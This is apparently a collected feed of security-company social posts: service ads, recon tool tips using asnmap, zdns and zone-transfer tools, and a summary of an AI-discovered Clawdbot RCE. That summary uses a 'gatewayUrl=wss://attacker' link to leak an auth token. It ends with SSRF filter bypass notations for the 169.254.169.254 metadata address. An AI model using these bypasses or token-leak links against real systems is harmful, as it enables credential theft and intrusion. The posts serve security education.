haksec.io

Our cybersecurity services: 🕸 Web application penetration testing 🌐 Network penetration testing 💪 Secure development training ⚔️ EASM 🏷 Whitelabeled services ☁️ Cloud security reviews 👮 General security consulting DM us for details 📨 haksec.io

@hackinghub_io ';--

Without naming the bug class, tell me 3 things about it that only a real hacker would recognize. 🕶️ Let's see who’s actually been in the terminal. 👇

@hackinghub_io idor for sure

$5K on the line. 💰  3 minutes to find one bug. Which vuln class are you betting on? 👇

If you are marketing a cybersecurity company, you need to watch this 👀

🚨We found RCE in Clawdbot 🚨 If you're using Clawdbot/Moltbot, I can get RCE on your computer just by getting you to click a link.  The coolest part? This vulnerability (CVE-2026-25253) took only 100 minutes to discover, and it was discovered completely autonomously using @Ethiack's AI pentesting solution "Hackian". Here's how it went down 👇 We set Hackian against Clawdbot, purely blackbox. It discovered that the Control UI stores the gateway auth token in localStorage and builds the first WebSocket connect frame from it on load. Hackian discovered that the UI also accepts "gatewayUrl" via query params: /chat?gatewayUrl=wss://attacker. This overrides the saved gateway and auto connects 😏 On first load, the UI immediately opens a WebSocket to the attacker URL and sends the token! Think that's cool? Wait until you see how it upgraded this to a full RCE for local Clawdbot systems. Read the deets 👇 ethiack.com/news/blog/one-…

Could this be the longest way to perform Google dorks? 😂

How to quickly find any mention of something in your files with the find command: ⌨️ find . -name "*zdns*" 2>1& Watch this 📺👇

Mass-perform AXFR requests on domains with hakaxfr! A simple Go tool for attempting zone transfers. Install here: github.com/hakluke/hakaxfr

Need to extract the root domains from a list of subdomains? Try using dsieve by @trick3st! Really handy tool for filtering and enriching a list of subdomains!

Using 3 words or less, why did you start hacking?

EASM is not just for defenders. It can also be used for offensive security! Here are some advanced subdomain recon techniques for your own (offensive) EASM 👇 labs.detectify.com/how-to/advance…

Anyone else do this or just me?

What's the dumbest solution to a tech problem that actually worked?

Check the rep of an email address with emailrep.io! Discover if an email is linked to suspicious activity or if it is legit! Great for your next OSINT investigation!

A quick way to get the ASN details of an organization using @pdiscoveryio's ASNmap! ⌨️ asnmap -org PAYPAL -json | jq -r .as_number | sort -u

Every customer's security needs are unique, that's why we pride ourselves on providing bespoke solutions including: - Web app and network penetration testing - Secure dev training - EASM - Whitelabeling - Cloud security reviews - General consulting haksec.io

You can choose one vulnerability scanner, what is it?

Wanna build your own attack surface management platform? You should check out this @pdiscoveryio guide! You'll learn how to use projectdiscovery tools to create your own automated ASM platform as well as an API to go with it👇 blog.projectdiscovery.io/asm-platform-u…

Dump DNS records en masse with zdns! As you can see below, Paypal have TXT records related to Notion, Stripe and Miro! Install here: github.com/zmap/zdns

Get CIDR ranges associated with an organization with @pdiscoveryio's ASNmap! All you need to do is "asnmap -org <ORG-NAME>" and you'll get a list CIDRs to do with as you so please!

Learn more here: labs.detectify.com/security-guida…

4. Non-standard IP notations can sneak past filters looking for 169.254.169.254 specifically. Try octal (025177524776), hex (0xa9fea9fe), integer (2852039166), or IPv6 (::ffff:a9fe:a9fe) notation.

If your SSRF attempts don't work initially, there are some common bypasses you can try. Here's are 4 techniques to bypass SSRF filters: